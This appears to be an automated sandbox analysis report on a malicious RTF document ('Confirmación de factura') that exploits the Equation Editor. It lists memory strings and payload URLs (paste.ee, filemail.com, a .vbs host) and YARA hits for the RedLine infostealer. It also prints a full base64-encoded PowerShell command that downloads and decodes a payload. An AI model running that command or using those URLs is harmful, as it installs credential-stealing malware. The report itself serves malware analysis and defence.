      Source: wscript.exe, 00000006.00000003.367931792.00000000007E5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.367830363.00000000007E5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.367578867.00000000007E5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.367770621.00000000007E5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.368205419.00000000007E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodO
      Source: wscript.exe, 00000006.00000003.488140647.00000000007E5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.367931792.00000000007E5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.367830363.00000000007E5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.367578867.00000000007E5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.367770621.00000000007E5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.368205419.00000000007E5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000002.488529203.00000000007E5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.488373471.00000000007E5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.427421639.0000000005053000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
      Source: wscript.exe, 00000006.00000003.367830363.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.488167246.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.367578867.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.367931792.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.488373471.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000002.488529203.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.368205419.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.367770621.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.427421639.0000000005053000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
      Source: wscript.exe, 00000006.00000003.367830363.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.488167246.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.367578867.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.367931792.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.488373471.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000002.488529203.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.368205419.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.367770621.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.427421639.0000000005053000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
      Source: wscript.exe, 00000006.00000003.367830363.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.488167246.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.367578867.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.367931792.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.488373471.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000002.488529203.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.368205419.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.367770621.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.427421639.0000000005053000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
      Source: wscript.exe, 00000006.00000003.488140647.00000000007E5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.367931792.00000000007E5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.367830363.00000000007E5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.367578867.00000000007E5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.367770621.00000000007E5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.368205419.00000000007E5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000002.488529203.00000000007E5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.488373471.00000000007E5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.427421639.0000000005053000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
      Source: wscript.exe, 00000006.00000003.367830363.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.488167246.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.367578867.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.367931792.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.488373471.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000002.488529203.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.368205419.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.367770621.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.427421639.0000000005053000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
      Source: wscript.exe, 00000006.00000003.367830363.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.488167246.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.367578867.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.367931792.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.488373471.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000002.488529203.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.368205419.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.367770621.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.427421639.0000000005053000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
      Source: powershell.exe, 00000009.00000002.420299334.0000000003329000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
      Source: wscript.exe, 00000006.00000003.367830363.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.488167246.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.367578867.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.367931792.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.488373471.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000002.488529203.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.368205419.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.367770621.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.427421639.0000000005053000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
      Source: wscript.exe, 00000006.00000003.367830363.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.488167246.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.367578867.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.367931792.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.488373471.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000002.488529203.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.368205419.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.367770621.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.427421639.0000000005053000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
      Source: wscript.exe, 00000006.00000003.367830363.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.488167246.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.367578867.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.367931792.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.488373471.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000002.488529203.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.368205419.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.367770621.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.427421639.0000000005053000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
      Source: wscript.exe, 00000006.00000003.367830363.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.488167246.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.367578867.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.367931792.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.488373471.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000002.488529203.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.368205419.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.367770621.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.427421639.0000000005053000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
      Source: wscript.exe, 00000006.00000003.367830363.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.488167246.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.367578867.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.367931792.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.488373471.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000002.488529203.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.368205419.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.367770621.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.427421639.0000000005053000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
      Source: wscript.exe, 00000006.00000003.367830363.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.488167246.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.367578867.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.367931792.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.488373471.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000002.488529203.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.368205419.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.367770621.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.427421639.0000000005053000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
      Source: wscript.exe, 00000006.00000003.367830363.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.488167246.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.367578867.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.367931792.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.488373471.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000002.488529203.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.368205419.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.367770621.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.427421639.0000000005053000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
      Source: wscript.exe, 00000006.00000003.368205419.00000000007A4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.367830363.00000000007A4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.367578867.00000000007A4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.367770621.00000000007A4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.367931792.00000000007A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://paste.ee/d/qImLHCIVJNQUKABWTPtLHCIVJNQUKABWTPr
      Source: wscript.exe, 00000006.00000003.368205419.00000000007A4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.367830363.00000000007A4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.367578867.00000000007A4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.367770621.00000000007A4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.367931792.00000000007A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://paste.ee/d/qImtLHCIVJNQUKABWTPr
      Source: wscript.exe, 00000006.00000002.488497716.000000000076E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.488280342.000000000076D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.488197286.000000000076D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://paste.ee/d/qImtrnged;
      Source: wscript.exe, 00000006.00000003.488095665.00000000003A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://paste.ee/d/qImtrq
      Source: wscript.exe, 00000006.00000003.368205419.00000000007A4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.367830363.00000000007A4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.367578867.00000000007A4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.367770621.00000000007A4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.367931792.00000000007A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://paste.ee/dLHCIVJNQUKABWTP/LHCIVJNQUKABWTPqLHCIVJNQUKABWTPILHCIVJNQUKABWTPmLHCIVJNQUKABWTPtLHC
      Source: EQNEDT32.EXE, EQNEDT32.EXE, 00000002.00000002.358961758.00000000002CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sbv.pushswroller.eu/tes/jukhccby.vbs
      Source: EQNEDT32.EXE, 00000002.00000002.358961758.00000000002CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sbv.pushswroller.eu/tes/jukhccby.vbs8
      Source: EQNEDT32.EXE, 00000002.00000002.358961758.00000000002CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sbv.pushswroller.eu/tes/jukhccby.vbsj
      Source: EQNEDT32.EXE, 00000002.00000002.358961758.00000000002CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sbv.pushswroller.eu/tes/jukhccby.vbsmmC:
      Source: powershell.exe, 00000007.00000002.483386172.0000000002369000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.420299334.0000000002301000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: wscript.exe, 00000006.00000003.367830363.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.488167246.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.367578867.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.367931792.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.488373471.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000002.488529203.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.368205419.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.367770621.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.427421639.0000000005053000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
      Source: wscript.exe, 00000006.00000003.367830363.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.488167246.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.367578867.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.367931792.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.488373471.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000002.488529203.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.368205419.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.367770621.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.427421639.0000000005053000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
      Source: powershell.exe, 00000009.00000002.420299334.000000000243A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://1017.filemail.com
      Source: powershell.exe, 00000009.00000002.420299334.000000000243A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6S
      Source: wscript.exe, 00000006.00000003.367830363.00000000007AB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.488373471.00000000007E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://analytics.paste.ee
      Source: wscript.exe, 00000006.00000003.367830363.00000000007AB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.488373471.00000000007E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://analytics.paste.ee;
      Source: wscript.exe, 00000006.00000003.367830363.00000000007AB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.488373471.00000000007E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com
      Source: wscript.exe, 00000006.00000003.367830363.00000000007AB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.488373471.00000000007E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com;
      Source: powershell.exe, 00000009.00000002.420299334.0000000003329000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
      Source: powershell.exe, 00000009.00000002.420299334.0000000003329000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
      Source: powershell.exe, 00000009.00000002.420299334.0000000003329000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
      Source: wscript.exe, 00000006.00000003.367830363.00000000007AB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.488373471.00000000007E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com
      Source: wscript.exe, 00000006.00000003.367830363.00000000007AB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.488373471.00000000007E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com;
      Source: powershell.exe, 00000009.00000002.428248929.0000000006261000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/dahall/taskscheduler
      Source: powershell.exe, 00000009.00000002.420299334.0000000003329000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
      Source: wscript.exe, 00000006.00000003.367830363.00000000007AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/d/qImtr
      Source: wscript.exe, 00000006.00000003.367830363.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.488167246.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.367578867.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.367931792.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.488373471.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000002.488529203.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.368205419.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.367770621.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.427421639.0000000005053000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
      Source: wscript.exe, 00000006.00000003.367830363.00000000007AB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.488373471.00000000007E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.gravatar.com
      Source: wscript.exe, 00000006.00000003.367830363.00000000007AB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.488373471.00000000007E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://themes.googleusercontent.com
      Source: wscript.exe, 00000006.00000003.367830363.00000000007AB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.488373471.00000000007E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
      Source: wscript.exe, 00000006.00000003.367830363.00000000007AB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.488373471.00000000007E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com;
      Source: wscript.exe, 00000006.00000003.367830363.00000000007AB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.488373471.00000000007E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49166
      Source: unknownNetwork traffic detected: HTTP traffic on port 49165 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49165
      Source: unknownNetwork traffic detected: HTTP traffic on port 49166 -> 443

      System Summary

      barindex
      Source: ConfirmaciXnXdeXfacturaXPedidoXadicional.doc, type: SAMPLEMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
      Source: 9.2.powershell.exe.380f018.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
      Source: Process Memory Space: powershell.exe PID: 3916, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
      Source: Process Memory Space: powershell.exe PID: 4004, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
      Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: ADODB.Stream HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}\ProgIDJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\ProgIDJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Server XML HTTP 6.0 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{88D96A0B-F192-11D4-A65F-0040963251E5}\ProgIDJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: WinHttpRequest Component version 5.1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{2087C2F4-2CEF-4953-A8AB-66779B670495}\ProgIDJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LgAgACgAIAAoAFsAUwB0AHIAaQBuAEcAXQAkAHYARQBSAEIAbwBTAGUAUAByAGUARgBFAHIAZQBOAGMAZQApAFsAMQAsADMAXQArACcAeAAnAC0AagBvAEkAbgAnACcAKQAoACgAJwBLADYAcABpAG0AYQBnAGUAVQByAGwAJwArACcAIAA9ACAAcwAnACsAJwBTAFgAaAB0AHQAcABzADoALwAnACsAJwAvADEAMAAxADcALgBmAGkAbABlAG0AYQBpAGwALgBjAG8AbQAnACsAJwAvAGEAcABpACcAKwAnAC8AZgBpAGwAZQAvAGcAZQB0AD8AZgBpAGwAZQBrAGUAeQAnACsAJwA9ADIAJwArACcAQQBhACcAKwAnAF8AYgBXAG8AOQBSAGUAdQA0ADUAdAA3AEIAVQAxAGsAVgBnAHMAZAA5ACcAKwAnAHAAVAA5AHAAJwArACcAZwBTAFMAbAB2AFMAdABHAHIAbgBUAEkAJwArACcAQwBmAEYAaABtAFQASwBqACcAKwAnADMATABDADYAUwBRAHQASQBjAE8AYwBfAFQAMwA1AHcAJgBwAGsAXwB2AGkAZAA9AGYAZAA0AGYANgAxADQAYgBiADIAMAA5AGMANgAyAGMAMQA3ADMAMAA5ADQANQAxADcANgBhADAAOQAwADQAZgAgAHMAUwBYADsASwA2AHAAdwBlAGIAQwBsAGkAZQBuAHQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDACcAKwAnAGwAaQBlAG4AdAA7AEsANgBwAGkAbQBhAGcAZQBCAHkAdABlAHMAIAA9ACAASwA2AHAAdwBlACcAKwAnAGIAQwBsAGkAZQBuAHQALgBEAG8AdwBuAGwAbwBhACcAKwAnAGQARABhAHQAYQAoAEsANgBwAGkAbQBhAGcAZQBVAHIAbAApADsASwA2AHAAaQBtAGEAZwBlAFQAZQB4AHQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgASwA2AHAAaQBtAGEAZwBlAEIAeQB0AGUAcwApADsASwA2AHAAcwB0AGEAcgB0AEYAbABhAGcAIAA9ACAAcwBTAFgAPAA8AEIAQQBTAEUANgA0AF8AUwBUAEEAUgBUAD4APgBzAFMAWAA7AEsANgBwAGUAbgBkAEYAbABhAGcAIAA9ACAAcwAnACsAJwBTAFgAPAA8AEIAQQBTAEUANgA0AF8ARQAnACsAJwBOAEQAPgA+AHMAUwBYADsASwA2AHAAcwB0AGEAcgAnACsAJwB0AEkAbgBkAGUAeAAgAD0AIABLADYAcABpAG0AYQBnAGUAVABlAHgAdAAuAEkAbgBkAGUAeABPAGYAKABLADYAcABzAHQAYQByAHQARgBsAGEAZwApADsASwA2AHAAZQBuAGQASQBuAGQAZQB4ACAAPQAgAEsANgBwAGkAbQBhAGcAZQBUAGUAeAB0AC4ASQBuAGQAZQB4AE8AZgAoAEsANgBwAGUAbgBkAEYAbABhAGcAKQA7AEsAJwArACcANgBwAHMAdABhAHIAdABJAG4AZABlAHgAIAAtAGcAZQAgADAAIAAtAGEAbgBkACAASwA2AHAAZQBuAGQASQBuAGQAZQB4ACAALQBnAHQAJwArACcAIABLADYAcABzAHQAYQByAHQASQBuAGQAZQB4ADsASwA2AHAAcwB0AGEAcgB0AEkAbgBkAGUAeAAgACsAPQAgAEsANgBwAHMAdABhAHIAdABGAGwAYQBnAC4ATABlAG4AZwB0AGgAOwBLADYAcABiAGEAcwBlADYANABMAGUAbgBnAHQAaAAgAD0AIABLADYAcABlAG4A